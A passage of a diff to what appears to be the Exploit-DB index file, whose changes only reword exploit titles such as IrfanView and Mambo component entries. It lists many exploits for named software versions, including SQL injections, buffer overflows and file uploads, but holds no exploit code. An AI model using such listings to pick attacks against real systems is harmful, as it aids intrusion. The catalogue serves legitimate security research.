Inclusion",2008-07-01,StAkeR,php,webapps,0 5983,platforms/php/webapps/5983.txt,"CAT2 - (spaw_root) Local File Inclusion",2008-07-01,StAkeR,php,webapps,0 @@ -5808,7 +5808,7 @@ id,file,description,date,author,platform,type,port 6185,platforms/php/webapps/6185.txt,"Scripts24 iTGP 1.0.4 - 'id' SQL Injection",2008-08-01,Mr.SQL,php,webapps,0 6186,platforms/php/webapps/6186.txt,"Scripts24 iPost 1.0.1 - 'id' SQL Injection",2008-08-01,Mr.SQL,php,webapps,0 6187,platforms/php/webapps/6187.txt,"eStoreAff 0.1 - 'cid' SQL Injection",2008-08-01,Mr.SQL,php,webapps,0 -6188,platforms/windows/local/6188.c,"Irfanview 3.99 - IFF File Local Stack Buffer Overflow",2008-08-01,"fl0 fl0w",windows,local,0 +6188,platforms/windows/local/6188.c,"IrfanView 3.99 - '.IFF' File Local Stack Buffer Overflow",2008-08-01,"fl0 fl0w",windows,local,0 6189,platforms/php/webapps/6189.txt,"GreenCart PHP Shopping Cart - 'id' SQL Injection",2008-08-01,"Hussin X",php,webapps,0 6190,platforms/php/webapps/6190.txt,"phsBlog 0.1.1 - Multiple SQL Injections",2008-08-01,cOndemned,php,webapps,0 6191,platforms/php/webapps/6191.txt,"e-vision CMS 2.02 - (SQL Injection / Arbitrary File Upload / Information Gathering) Multiple Vulnerabilities",2008-08-02,"Khashayar Fereidani",php,webapps,0 @@ -6631,7 +6631,7 @@ id,file,description,date,author,platform,type,port 7061,platforms/php/webapps/7061.txt,"V3 Chat Profiles/Dating Script 3.0.2 - (Authentication Bypass) SQL Injection",2008-11-08,d3b4g,php,webapps,0 7062,platforms/php/webapps/7062.txt,"ZeeJobsite 2.0 - Arbitrary File Upload",2008-11-08,ZoRLu,php,webapps,0 7063,platforms/php/webapps/7063.txt,"V3 Chat Profiles/Dating Script 3.0.2 - Insecure Cookie Handling",2008-11-08,Stack,php,webapps,0 -7064,platforms/php/webapps/7064.pl,"Mambo Component n-form - (form_id) Blind SQL Injection",2008-11-08,boom3rang,php,webapps,0 +7064,platforms/php/webapps/7064.pl,"Mambo Component 'com_n-forms' - 'form_id' Parameter Blind SQL Injection",2008-11-08,boom3rang,php,webapps,0 7065,platforms/php/webapps/7065.txt,"Cyberfolio 7.12.2 - (css.php theme) Local File Inclusion",2008-11-08,dun,php,webapps,0 7066,platforms/php/webapps/7066.txt,"Zeeways Shaadi Clone 2.0 - Authentication Bypass",2008-11-08,G4N0K,php,webapps,0 7067,platforms/asp/webapps/7067.txt,"DigiAffiliate 1.4 - (Authentication Bypass) SQL Injection",2008-11-08,d3b4g,asp,webapps,0 @@ -7402,7 +7402,7 @@ id,file,description,date,author,platform,type,port 7857,platforms/windows/dos/7857.pl,"Merak Media Player 3.2 - '.m3u' File Local Buffer Overflow (PoC)",2009-01-25,Houssamix,windows,dos,0 7858,platforms/hardware/remote/7858.php,"Siemens ADSL SL2-141 - Cross-Site Request Forgery",2009-01-25,spdr,hardware,remote,0 7859,platforms/php/webapps/7859.pl,"MemHT Portal 4.0.1 - (avatar) Remote Code Execution",2009-01-25,StAkeR,php,webapps,0 -7860,platforms/php/webapps/7860.php,"Mambo com_sim 0.8 - Blind SQL Injection",2009-01-25,"Mehmet Ince",php,webapps,0 +7860,platforms/php/webapps/7860.php,"Mambo Component 'com_sim' 0.8 - Blind SQL Injection",2009-01-25,"Mehmet Ince",php,webapps,0 7861,platforms/asp/webapps/7861.txt,"Web-Calendar Lite 1.0 - (Authentication Bypass) SQL Injection",2009-01-25,ByALBAYX,asp,webapps,0 7862,platforms/php/webapps/7862.txt,"Flax Article Manager 1.1 - 'cat_id' SQL Injection",2009-01-25,JIKO,php,webapps,0 7863,platforms/php/webapps/7863.txt,"OpenGoo 1.1 - (script_class) Local File Inclusion",2009-01-25,fuzion,php,webapps,0 @@ -9077,7 +9077,7 @@ id,file,description,date,author,platform,type,port 9606,platforms/windows/dos/9606.pl,"Apple Safari 3.2.3 (Windows x86) - JavaScript (eval) Remote Denial of Service",2009-09-09,"Jeremy Brown",windows,dos,0 9607,platforms/windows/dos/9607.pl,"Ipswitch WS_FTP 12 Professional - Remote Format String (PoC)",2009-09-09,"Jeremy Brown",windows,dos,0 9608,platforms/linux/local/9608.c,"GemStone/S 6.3.1 - (stoned) Local Buffer Overflow",2009-09-09,"Jeremy Brown",linux,local,0 -9609,platforms/php/webapps/9609.txt,"Mambo Component com_hestar - SQL Injection",2009-09-09,M3NW5,php,webapps,0 +9609,platforms/php/webapps/9609.txt,"Mambo Component 'com_hestar' - SQL Injection",2009-09-09,M3NW5,php,webapps,0 9610,platforms/windows/local/9610.py,"Audio Lib Player - '.m3u' Buffer Overflow (SEH)",2009-09-09,blake,windows,local,0 9611,platforms/php/webapps/9611.txt,"PHPNagios 1.2.0 - (menu.php) Local File Inclusion",2009-09-09,CoBRa_21,php,webapps,0 9612,platforms/asp/webapps/9612.txt,"ChartDirector 5.0.1 - (cacheId) Arbitrary File Disclosure",2009-09-09,DokFLeed,asp,webapps,0 @@ -9178,7 +9178,7 @@ id,file,description,date,author,platform,type,port 9711,platforms/php/webapps/9711.txt,"FMyClone 2.3 - Multiple SQL Injections",2009-09-17,"learn3r hacker",php,webapps,0 9712,platforms/php/webapps/9712.txt,"Nephp Publisher Enterprise 4.5 - (Authentication Bypass) SQL Injection",2009-09-17,"learn3r hacker",php,webapps,0 9713,platforms/php/webapps/9713.pl,"Joomla! Component com_jreservation 1.5 - 'pid' Blind SQL Injection",2009-09-17,"Chip d3 bi0s",php,webapps,0 -9714,platforms/multiple/webapps/9714.txt,"Mambo com_koesubmit 1.0.0 - Remote File Inclusion",2009-10-18,"Don Tukulesto",multiple,webapps,0 +9714,platforms/multiple/webapps/9714.txt,"Mambo Component com_koesubmit 1.0.0 - Remote File Inclusion",2009-10-18,"Don Tukulesto",multiple,webapps,0 9715,platforms/multiple/webapps/9715.txt,"Zainu 1.0 - SQL Injection",2009-09-18,snakespc,multiple,webapps,0 9716,platforms/multiple/webapps/9716.txt,"Network Management/Inventory System - header.php Remote File Inclusion",2009-09-18,"EA Ngel",multiple,webapps,0 9717,platforms/windows/dos/9717.txt,"Xerver HTTP Server 4.32 - Remote Denial of Service",2009-09-18,Dr_IDE,windows,dos,0 @@ -9228,7 +9228,7 @@ id,file,description,date,author,platform,type,port 9829,platforms/multiple/remote/9829.txt,"Nginx 0.7.61 - WebDAV Directory Traversal",2009-09-23,kingcope,multiple,remote,80 9830,platforms/php/webapps/9830.txt,"Cour Supreme - SQL Injection",2009-09-23,"CrAzY CrAcKeR",php,webapps,0 9831,platforms/windows/local/9831.txt,"Avast! AntiVirus 4.8.1351.0 - Denial of Service / Privilege Escalation",2009-09-23,Evilcry,windows,local,0 -9832,platforms/php/webapps/9832.txt,"Joomla! / Mambo Component Tupinambis - SQL Injection",2009-09-22,"Don Tukulesto",php,webapps,0 +9832,platforms/php/webapps/9832.txt,"Joomla! / Mambo Component 'com_tupinambis' - SQL Injection",2009-09-22,"Don Tukulesto",php,webapps,0 9833,platforms/php/webapps/9833.txt,"Joomla! Component com_facebook - SQL Injection",2009-09-22,kaMtiEz,php,webapps,0 9834,platforms/asp/webapps/9834.txt,"BPLawyerCaseDocuments - SQL Injection",2009-09-22,"OoN Boy",asp,webapps,0 9835,platforms/php/webapps/9835.txt,"HB CMS 1.7 - SQL Injection",2009-09-22,"Securitylab Security Research",php,webapps,0 @@ -9495,7 +9495,7 @@ id,file,description,date,author,platform,type,port 10171,platforms/windows/dos/10171.py,"Baby Web Server 2.7.2 - found Denial of Service",2009-11-18,"Asheesh kumar Mani Tripathi",windows,dos,80 10176,platforms/windows/dos/10176.txt,"HP OpenView Network Node Manager (OV NNM) 7.53 - Invalid DB Error Code",2009-11-17,"Core Security",windows,dos,0 10177,platforms/php/webapps/10177.txt,"Joomla! Extension iF Portfolio Nexus - SQL Injection",2009-11-18,"599eme Man",php,webapps,0 -10178,platforms/php/webapps/10178.txt,"Joomla! / Mambo Component com_ezine 2.1 - Remote File Inclusion",2009-10-20,kaMtiEz,php,webapps,0 +10178,platforms/php/webapps/10178.txt,"Joomla! / Mambo Component 'com_ezine' 2.1 - Remote File Inclusion",2009-10-20,kaMtiEz,php,webapps,0 10180,platforms/php/webapps/10180.txt,"Simplog 0.9.3.2 - Multiple Vulnerabilities",2009-11-16,"Amol Naik",php,webapps,0 10181,platforms/php/webapps/10181.txt,"Bitrix Site Manager 4.0.5 - Remote File Inclusion",2005-06-15,"Don Tukulesto",php,webapps,0 10182,platforms/hardware/dos/10182.py,"2WIRE Router 5.29.52 - Remote Denial of Service",2009-10-29,hkm,hardware,dos,0 @@ -9973,7 +9973,7 @@ id,file,description,date,author,platform,type,port 10745,platforms/windows/local/10745.c,"Mini-stream Ripper 3.0.1.1 - '.pls' Local Universal Buffer Overflow",2009-12-27,mr_me,windows,local,0 10747,platforms/windows/local/10747.py,"Mini-stream Ripper (Windows XP SP2/SP3) - Exploit",2009-12-27,dijital1,windows,local,0 10748,platforms/windows/local/10748.rb,"Mini-stream 3.0.1.1 - Buffer Overflow (Metasploit) (1)",2009-12-27,dijital1,windows,local,0 -10750,platforms/php/webapps/10750.txt,"Mambo Component Material Suche 1.0 - SQL Injection",2009-12-27,Gamoscu,php,webapps,0 +10750,platforms/php/webapps/10750.txt,"Mambo Component 'com_materialsuche' 1.0 - SQL Injection",2009-12-27,Gamoscu,php,webapps,0 10751,platforms/php/webapps/10751.txt,"Koobi Pro 6.1 - Gallery (img_id)",2009-12-27,BILGE_KAGAN,php,webapps,0 10752,platforms/multiple/webapps/10752.txt,"Yonja - Arbitrary File Upload",2009-12-28,indoushka,multiple,webapps,80 10753,platforms/multiple/webapps/10753.txt,"ASP Simple Blog 3.0 - Arbitrary File Upload",2009-12-28,indoushka,multiple,webapps,80 @@ -10488,7 +10488,7 @@ id,file,description,date,author,platform,type,port 11443,platforms/php/webapps/11443.txt,"Calendarix 0.8.20071118 - SQL Injection",2010-02-14,Thibow,php,webapps,0 11444,platforms/php/webapps/11444.txt,"ShortCMS 1.2.0 - SQL Injection",2010-02-14,Thibow,php,webapps,0 11445,platforms/php/webapps/11445.txt,"JTL-Shop 2 - 'druckansicht.php' SQL Injection",2010-02-14,Lo$T,php,webapps,0 -11446,platforms/php/webapps/11446.txt,"Mambo com_akogallery - SQL Injection",2010-02-14,snakespc,php,webapps,0 +11446,platforms/php/webapps/11446.txt,"Mambo Component 'com_akogallery' - SQL Injection",2010-02-14,snakespc,php,webapps,0 11447,platforms/php/webapps/11447.txt,"Joomla! Component Jw_allVideos - Remote File Download",2010-02-14,"Pouya Daneshmand",php,webapps,0 11449,platforms/php/webapps/11449.txt,"Joomla! Component com_videos - SQL Injection",2010-02-14,snakespc,php,webapps,0 11450,platforms/php/webapps/11450.txt,"File Upload Manager 1.3 - Exploit",2010-02-14,ROOT_EGY,php,webapps,0 @@ -10512,7 +10512,7 @@ id,file,description,date,author,platform,type,port 11470,platforms/windows/dos/11470.py,"EasyFTP Server 1.7.0.2 - Authenticated Buffer Overflow (PoC)",2010-02-15,loneferret,windows,dos,0 11472,platforms/ios/dos/11472.py,"iOS FTP On The Go 2.1.2 - HTTP Remote Denial of Service",2010-02-15,TecR0c,ios,dos,0 11473,platforms/php/webapps/11473.txt,"Pogodny CMS - SQL Injection",2010-02-16,Ariko-Security,php,webapps,0 -11474,platforms/php/webapps/11474.txt,"Mambo Component com_acnews - [id] SQL Injection",2010-02-16,"Zero Bits and Xzit3",php,webapps,0 +11474,platforms/php/webapps/11474.txt,"Mambo Component 'com_acnews' - 'id' Parameter SQL Injection",2010-02-16,"Zero Bits and Xzit3",php,webapps,0 11475,platforms/windows/local/11475.txt,"OtsTurntables Free 1.00.047 - '.olf' Universal Buffer Overflow",2010-02-16,mr_me,windows,local,0 11476,platforms/php/webapps/11476.txt,"SongForever.com Clone - Arbitrary File Upload",2010-02-16,indoushka,php,webapps,0 11477,platforms/php/webapps/11477.txt,"Limny 2.0 - Cross-Site Request Forgery (Change Email and Password)",2010-02-16,"Luis Santana",php,webapps,0 @@ -10720,7 +10720,7 @@ id,file,description,date,author,platform,type,port 11715,platforms/php/webapps/11715.txt,"systemsoftware Community Black - 'index.php' SQL Injection",2010-03-13,"Easy Laster",php,webapps,0 11717,platforms/multiple/dos/11717.php,"Multiple PHP Functions - Local Denial of Service Vulnerabilities",2010-03-13,"Yakir Wizman",multiple,dos,0 11718,platforms/php/webapps/11718.txt,"Xbtit 2.0.0 - SQL Injection",2010-03-13,Ctacok,php,webapps,0 -11719,platforms/php/webapps/11719.txt,"Mambo Component com_mambads - SQL Injection",2010-03-13,Dreadful,php,webapps,0 +11719,platforms/php/webapps/11719.txt,"Mambo Component 'com_mambads' - SQL Injection",2010-03-13,Dreadful,php,webapps,0 11720,platforms/linux/remote/11720.py,"Microworld eScan AntiVirus < 3.x - Remote Root Command Execution",2010-03-13,"Mohammed almutairi",linux,remote,0 11721,platforms/php/webapps/11721.txt,"GeekHelps ADMP 1.01 - Multiple Vulnerabilities",2010-03-13,ITSecTeam,php,webapps,0 11722,platforms/php/webapps/11722.txt,"Ad Board Script 1.01 - Local File Inclusion",2010-03-13,ITSecTeam,php,webapps,0 @@ -11307,7 +11307,7 @@ id,file,description,date,author,platform,type,port 12376,platforms/php/webapps/12376.php,"SmodCMS 4.07 (fckeditor) - Arbitrary File Upload",2010-04-24,eidelweiss,php,webapps,0 12378,platforms/php/webapps/12378.txt,"CMS Firebrand Tec - Local File Inclusion",2010-04-25,R3VAN_BASTARD,php,webapps,0 12379,platforms/windows/local/12379.php,"Easyzip 2000 3.5 - '.zip' Stack Buffer Overflow (PoC)",2010-04-25,mr_me,windows,local,0 -12380,platforms/windows/remote/12380.pl,"Rumba ftp Client 4.2 - PASV Buffer Overflow (SEH)",2010-04-25,zombiefx,windows,remote,0 +12380,platforms/windows/remote/12380.pl,"Rumba FTP Client 4.2 - PASV Buffer Overflow (SEH)",2010-04-25,zombiefx,windows,remote,0 12381,platforms/php/webapps/12381.php,"phpegasus 0.1.2 - 'FCKeditor' Arbitrary File Upload",2010-04-25,eidelweiss,php,webapps,0 12382,platforms/multiple/dos/12382.txt,"Invision Power Board - Denial of Service",2010-04-25,SeeMe,multiple,dos,0 12383,platforms/php/webapps/12383.txt,"clipak - Arbitrary File Upload",2010-04-25,indoushka,php,webapps,0 @@ -13725,7 +13725,7 @@ id,file,description,date,author,platform,type,port 15792,platforms/hardware/dos/15792.php,"Apple iOS Safari - (body alink) Remote Crash",2010-12-20,"Yakir Wizman",hardware,dos,0 15793,platforms/php/webapps/15793.txt,"Vacation Rental Script 4.0 - Arbitrary File Upload",2010-12-20,Br0ly,php,webapps,0 15794,platforms/hardware/dos/15794.php,"Apple iOS Safari - (decodeURI) Remote Crash",2010-12-20,"Yakir Wizman",hardware,dos,0 -15795,platforms/php/webapps/15795.txt,"Serendipity 1.5.4 - Arbitrary File Upload",2010-12-21,pentesters.ir,php,webapps,0 +15795,platforms/php/webapps/15795.txt,"S9Y Serendipity 1.5.4 - Arbitrary File Upload",2010-12-21,pentesters.ir,php,webapps,0 15796,platforms/hardware/dos/15796.php,"Apple iOS Safari - (decodeURIComponent) Remote Crash",2010-12-21,"Yakir Wizman",hardware,dos,0 15797,platforms/php/webapps/15797.txt,"Hycus CMS - Multiple Vulnerabilities",2010-12-21,"High-Tech Bridge SA",php,webapps,0 15798,platforms/php/webapps/15798.txt,"Injader CMS - Multiple Vulnerabilities",2010-12-21,"High-Tech Bridge SA",php,webapps,0 @@ -13771,7 +13771,7 @@ id,file,description,date,author,platform,type,port 15846,platforms/php/webapps/15846.txt,"kaibb 1.0.1 - Multiple Vulnerabilities",2010-12-29,"High-Tech Bridge SA",php,webapps,0 15847,platforms/php/webapps/15847.txt,"DzTube - SQL Injection",2010-12-29,"errnick qwe",php,webapps,0 15848,platforms/php/webapps/15848.txt,"PHP-AddressBook 6.2.4 - (group.php) SQL Injection",2010-12-29,hiphop,php,webapps,0 -15845,platforms/windows/dos/15845.py,"Irfanview 4.27 - 'JP2000.dll' plugin Denial of Service",2010-12-29,BraniX,windows,dos,0 +15845,platforms/windows/dos/15845.py,"IrfanView 4.27 - 'JP2000.dll' plugin Denial of Service",2010-12-29,BraniX,windows,dos,0 15849,platforms/php/webapps/15849.txt,"LoveCMS 1.6.2 - Cross-Site Request Forgery / Code Injection",2010-12-29,hiphop,php,webapps,0 15850,platforms/php/webapps/15850.html,"PiXie CMS 1.04 - Multiple Cross-Site Request Forgery Vulnerabilities",2010-12-29,"Ali Raheem",php,webapps,0 15851,platforms/windows/dos/15851.py,"QuickTime Picture Viewer 7.6.6 JP2000 - Denial of Service",2010-12-29,BraniX,windows,dos,0 @@ -13837,7 +13837,7 @@ id,file,description,date,author,platform,type,port 15944,platforms/linux/local/15944.c,"Linux Kernel < 2.6.34 (Ubuntu 10.10 x86/x64) - 'CAP_SYS_ADMIN' Privilege Escalation (2)",2011-01-08,"Joe Sylve",linux,local,0 15945,platforms/php/webapps/15945.txt,"Zwii 2.1.1 - Remote File Inclusion",2011-01-08,"Abdi Mohamed",php,webapps,0 16123,platforms/hardware/remote/16123.txt,"Comcast DOCSIS 3.0 Business Gateways - Multiple Vulnerabilities",2011-02-06,"Trustwave's SpiderLabs",hardware,remote,0 -15946,platforms/windows/dos/15946.py,"Irfanview 4.28 - Multiple Denial of Service Vulnerabilities",2011-01-09,BraniX,windows,dos,0 +15946,platforms/windows/dos/15946.py,"IrfanView 4.28 - Multiple Denial of Service Vulnerabilities",2011-01-09,BraniX,windows,dos,0 15958,platforms/php/webapps/15958.txt,"Joomla! Plugin Captcha 4.5.1 - Local File Disclosure",2011-01-09,dun,php,webapps,0 15959,platforms/windows/dos/15959.pl,"Macro Express Pro 4.2.2.1 - '.MXE' File Syntactic Analysis Buffer Overflow (PoC)",2011-01-10,LiquidWorm,windows,dos,0 15960,platforms/php/webapps/15960.txt,"Maximus CMS 1.1.2 - 'FCKeditor' Arbitrary File Upload",2011-01-10,eidelweiss,php,webapps,0 @@ -14931,8 +14931,8 @@ id,file,description,date,author,platform,type,port 17180,platforms/php/webapps/17180.txt,"Shape Web Solutions CMS - SQL Injection",2011-04-16,"Ashiyane Digital Security Team",php,webapps,0 17140,platforms/multiple/dos/17140.txt,"Libmodplug ReadS3M - Stack Overflow",2011-04-09,"SEC Consult",multiple,dos,0 17141,platforms/php/webapps/17141.txt,"Point Market System 3.1x vBulletin plugin - SQL Injection",2011-04-10,Net.Edit0r,php,webapps,0 -17142,platforms/windows/dos/17142.py,"Irfanview 4.28 - ICO With Transparent Colour Denial of Service & RDenial of Service",2011-04-10,BraniX,windows,dos,0 -17143,platforms/windows/dos/17143.py,"Irfanview 4.28 - ICO Without Transparent Colour Denial of Service & RDenial of Service",2011-04-10,BraniX,windows,dos,0 +17142,platforms/windows/dos/17142.py,"IrfanView 4.28 - .ICO With Transparent Colour Denial of Service / Remote Denial of Service",2011-04-10,BraniX,windows,dos,0 +17143,platforms/windows/dos/17143.py,"IrfanView 4.28 - .ICO Without Transparent Colour Denial of Service / Remote Denial of Service",2011-04-10,BraniX,windows,dos,0 17144,platforms/windows/local/17144.pl,"MikeyZip 1.1 - '.zip' Buffer Overflow",2011-04-10,"C4SS!0 G0M3S",windows,local,0 17146,platforms/php/webapps/17146.txt,"K-Links - Link Directory Script SQL Injection",2011-04-11,R3d-D3V!L,php,webapps,0 17147,platforms/linux/local/17147.txt,"tmux 1.3/1.4 - '-S' Option Incorrect SetGID Privilege Escalation",2011-04-11,ph0x90bic,linux,local,0 @@ -15226,7 +15226,7 @@ id,file,description,date,author,platform,type,port 17503,platforms/jsp/webapps/17503.pl,"ManageEngine ServiceDesk 8.0.0.12 - Database Disclosure",2011-07-07,@ygoltsev,jsp,webapps,0 17507,platforms/hardware/remote/17507.py,"Avaya IP Office Manager TFTP Server 8.1 - Directory Traversal",2011-07-08,"SecPod Research",hardware,remote,0 39661,platforms/windows/remote/39661.rb,"Easy File Sharing HTTP Server 7.2 - SEH Overflow (Metasploit)",2016-04-05,Metasploit,windows,remote,80 -39662,platforms/windows/remote/39662.rb,"PCMan FTP Server Buffer Overflow - PUT Command (Metasploit)",2016-04-05,Metasploit,windows,remote,21 +39662,platforms/windows/remote/39662.rb,"PCMan FTP Server Buffer Overflow - 'PUT' Command (Metasploit)",2016-04-05,Metasploit,windows,remote,21 17508,platforms/php/webapps/17508.txt,"appRain Quick Start Edition Core Edition Multiple 0.1.4-Alpha - Cross-Site Scripting Vulnerabilities",2011-07-08,"SecPod Research",php,webapps,0 17510,platforms/php/webapps/17510.py,"phpMyAdmin3 (pma3) - Remote Code Execution",2011-07-08,wofeiwo,php,webapps,0 17511,platforms/windows/local/17511.pl,"ZipGenius 6.3.2.3000 - '.zip' Buffer Overflow",2011-07-08,"C4SS!0 G0M3S",windows,local,0 @@ -15351,7 +15351,7 @@ id,file,description,date,author,platform,type,port 17659,platforms/windows/remote/17659.rb,"Microsoft MPEG Layer-3 Audio - Stack Based Overflow (MS10-026)",2011-08-13,Metasploit,windows,remote,0 17660,platforms/php/webapps/17660.txt,"VideoDB 3.1.0 - SQL Injection",2011-08-13,seceurityoverun,php,webapps,0 17661,platforms/php/webapps/17661.txt,"Kahf Poems 1.0 - Multiple Vulnerabilities",2011-08-13,"Yassin Aboukir",php,webapps,0 -17662,platforms/php/webapps/17662.txt,"Mambo CMS 4.6.x - (4.6.5) SQL Injection",2011-08-13,"Aung Khant",php,webapps,0 +17662,platforms/php/webapps/17662.txt,"Mambo 4.6.x < 4.6.5 - SQL Injection",2011-08-13,"Aung Khant",php,webapps,0 17670,platforms/hardware/remote/17670.py,"Sagem Router Fast 3304/3464/3504 - Telnet Authentication Bypass",2011-08-16,"Elouafiq Ali",hardware,remote,0 17664,platforms/windows/dos/17664.py,"NSHC Papyrus 2.0 - Heap Overflow",2011-08-13,wh1ant,windows,dos,0 17667,platforms/php/webapps/17667.php,"Contrexx ShopSystem 2.2 SP3 - Blind SQL Injection",2011-08-14,Penguin,php,webapps,0 @@ -15738,7 +15738,7 @@ id,file,description,date,author,platform,type,port 18106,platforms/windows/dos/18106.pl,"Soda PDF Professional 1.2.155 - '.pdf' / '.WWF' File Handling Denial of Service",2011-11-11,LiquidWorm,windows,dos,0 18107,platforms/windows/dos/18107.py,"Kool Media Converter 2.6.0 - Denial of Service",2011-11-11,swami,windows,dos,0 18109,platforms/windows/local/18109.rb,"Aviosoft Digital TV Player Professional 1.0 - Stack Buffer Overflow (Metasploit)",2011-11-13,Metasploit,windows,local,0 -18110,platforms/php/webapps/18110.txt,"Mambo CMS 4.x - (Zorder) SQL Injection",2011-11-13,"KraL BeNiM",php,webapps,0 +18110,platforms/php/webapps/18110.txt,"Mambo 4.x - 'Zorder' SQL Injection",2011-11-13,"KraL BeNiM",php,webapps,0 18119,platforms/windows/dos/18119.rb,"Attachmate Reflection FTP Client - Heap Overflow",2011-11-16,"Francis Provencher",windows,dos,0 18120,platforms/linux/dos/18120.py,"FleaHttpd - Remote Denial of Service",2011-11-16,condis,linux,dos,80 18111,platforms/php/webapps/18111.php,"WordPress Plugin Zingiri 2.2.3 - (ajax_save_name.php) Remote Code Execution",2011-11-13,EgiX,php,webapps,0 @@ -15843,9 +15843,9 @@ id,file,description,date,author,platform,type,port 18249,platforms/php/webapps/18249.txt,"appRain CMF 0.1.5 - Multiple Web Vulnerabilities",2011-12-19,Vulnerability-Lab,php,webapps,0 18250,platforms/php/webapps/18250.txt,"DotA OpenStats 1.3.9 - SQL Injection",2011-12-19,HvM17,php,webapps,0 18251,platforms/php/webapps/18251.txt,"Joomla! Component com_dshop - SQL Injection",2011-12-19,CoBRa_21,php,webapps,0 -18257,platforms/windows/dos/18257.txt,"Irfanview - '.tiff' Image Processing Buffer Overflow",2011-12-20,"Francis Provencher",windows,dos,0 +18257,platforms/windows/dos/18257.txt,"IrfanView - '.tiff' Image Processing Buffer Overflow",2011-12-20,"Francis Provencher",windows,dos,0 18254,platforms/windows/dos/18254.pl,"Free Mp3 Player 1.0 - Local Denial of Service",2011-12-19,JaMbA,windows,dos,0 -18256,platforms/windows/dos/18256.txt,"Irfanview FlashPix PlugIn - Double-Free",2011-12-20,"Francis Provencher",windows,dos,0 +18256,platforms/windows/dos/18256.txt,"IrfanView FlashPix PlugIn - Double-Free",2011-12-20,"Francis Provencher",windows,dos,0 18258,platforms/windows/local/18258.c,"TORCS 1.3.1 - acc Buffer Overflow",2011-12-20,"Andrés Gómez",windows,local,0 18259,platforms/php/webapps/18259.txt,"Infoproject Business Hero - Multiple Vulnerabilities",2011-12-21,LiquidWorm,php,webapps,0 18260,platforms/jsp/webapps/18260.txt,"Barracuda Control Center 620 - Multiple Web Vulnerabilities",2011-12-21,Vulnerability-Lab,jsp,webapps,0 @@ -16230,7 +16230,7 @@ id,file,description,date,author,platform,type,port 18736,platforms/php/webapps/18736.txt,"Invision Power Board 3.3.0 - Local File Inclusion",2012-04-13,waraxe,php,webapps,0 18737,platforms/php/webapps/18737.txt,"Ushahidi 2.2 - Multiple Vulnerabilities",2012-04-13,shpendk,php,webapps,0 18738,platforms/php/remote/18738.rb,"V-CMS - Arbitrary .PHP File Upload / Execution (Metasploit)",2012-04-14,Metasploit,php,remote,0 -18739,platforms/windows/dos/18739.txt,"Irfanview FlashPix PlugIn - Decompression Heap Overflow",2012-04-14,"Francis Provencher",windows,dos,0 +18739,platforms/windows/dos/18739.txt,"IrfanView FlashPix PlugIn - Decompression Heap Overflow",2012-04-14,"Francis Provencher",windows,dos,0 18749,platforms/osx/local/18749.py,"Office 2008 sp0 - RTF pFragments MAC Exploit",2012-04-18,"Abhishek Lyall",osx,local,0 18741,platforms/php/webapps/18741.txt,"Joomla! Component com_ponygallery - SQL Injection",2012-04-15,xDarkSton3x,php,webapps,0 18742,platforms/php/webapps/18742.php,"NetworX CMS - Cross-Site Request Forgery (Add Admin)",2012-04-15,N3t.Crack3r,php,webapps,0 @@ -16342,7 +16342,7 @@ id,file,description,date,author,platform,type,port 18878,platforms/windows/dos/18878.txt,"Pro-face Pro-Server EX WinGP PC Runtime - Multiple Vulnerabilities",2012-05-14,"Luigi Auriemma",windows,dos,0 18881,platforms/java/webapps/18881.txt,"Liferay Portal 6.0.x < 6.1 - Privilege Escalation",2012-05-13,"Jelmer Kuperus",java,webapps,0 18882,platforms/php/webapps/18882.txt,"b2ePms 1.0 - Authentication Bypass",2012-05-15,"Jean Pascal Pereira",php,webapps,0 -18884,platforms/php/webapps/18884.txt,"Serendipity 1.6 - Backend Cross-Site Scripting / SQL Injection",2012-05-08,"Stefan Schurtz",php,webapps,0 +18884,platforms/php/webapps/18884.txt,"S9Y Serendipity 1.6 - (Backend) Cross-Site Scripting / SQL Injection",2012-05-08,"Stefan Schurtz",php,webapps,0 18886,platforms/php/webapps/18886.txt,"Axous 1.1.1 - (Cross-Site Request Forgery / Persistent Cross-Site Scripting) Multiple Vulnerabilities",2012-05-16,"Ivano Binetti",php,webapps,0 18888,platforms/jsp/webapps/18888.txt,"OpenKM Document Management System 5.1.7 - Command Execution",2012-01-03,"Cyrill Brunschwiler",jsp,webapps,0 18889,platforms/php/webapps/18889.txt,"Artiphp CMS 5.5.0 - Database Backup Disclosure",2012-05-16,LiquidWorm,php,webapps,0 @@ -16406,11 +16406,11 @@ id,file,description,date,author,platform,type,port 18962,platforms/windows/dos/18962.py,"Sorensoft Power Media 6.0 - Denial of Service",2012-05-31,Onying,windows,dos,0 18967,platforms/windows/remote/18967.rb,"Citrix Provisioning Services 5.6 SP1 - Streamprocess Opcode 0x40020004 Buffer Overflow (Metasploit)",2012-06-01,Metasploit,windows,remote,0 18968,platforms/windows/remote/18968.rb,"Citrix Provisioning Services 5.6 SP1 - Streamprocess Opcode 0x40020006 Buffer Overflow (Metasploit)",2012-06-01,Metasploit,windows,remote,0 -18964,platforms/windows/dos/18964.txt,"Irfanview 4.33 - Format PlugIn ECW Decompression Heap Overflow",2012-06-01,"Francis Provencher",windows,dos,0 +18964,platforms/windows/dos/18964.txt,"IrfanView 4.33 - Format PlugIn ECW Decompression Heap Overflow",2012-06-01,"Francis Provencher",windows,dos,0 18970,platforms/php/webapps/18970.txt,"Membris 2.0.1 - Multiple Vulnerabilities",2012-06-01,Dr.abolalh,php,webapps,0 18965,platforms/php/webapps/18965.html,"4PSA VoIPNow Professional 2.5.3 - Multiple Vulnerabilities",2012-06-01,Aboud-el,php,webapps,0 18969,platforms/windows/remote/18969.rb,"Citrix Provisioning Services 5.6 SP1 - Streamprocess Opcode 0x40020002 Buffer Overflow (Metasploit)",2012-06-01,Metasploit,windows,remote,0 -18972,platforms/windows/dos/18972.txt,"Irfanview 4.33 - Format PlugIn TTF File Parsing Stack Based Overflow",2012-06-02,"Francis Provencher",windows,dos,0 +18972,platforms/windows/dos/18972.txt,"IrfanView 4.33 - Format PlugIn .TTF File Parsing Stack Based Overflow",2012-06-02,"Francis Provencher",windows,dos,0 18973,platforms/windows/remote/18973.rb,"GIMP script-fu - Server Buffer Overflow (Metasploit)",2012-06-02,Metasploit,windows,remote,0 18974,platforms/php/webapps/18974.txt,"Vanilla Forum Tagging Plugin Enchanced 1.0.1 - Persistent Cross-Site Scripting",2012-06-02,"Henry Hoggard",php,webapps,0 18986,platforms/windows/remote/18986.rb,"Sielco Sistemi Winlog 2.07.16 - Buffer Overflow",2012-06-05,m-1-k-3,windows,remote,0 @@ -16526,7 +16526,7 @@ id,file,description,date,author,platform,type,port 19112,platforms/linux/remote/19112.c,"Multiple OSes - BIND Buffer Overflow (2)",1998-04-08,prym,linux,remote,0 19113,platforms/windows/remote/19113.txt,"Microsoft Windows NT 3.5.1 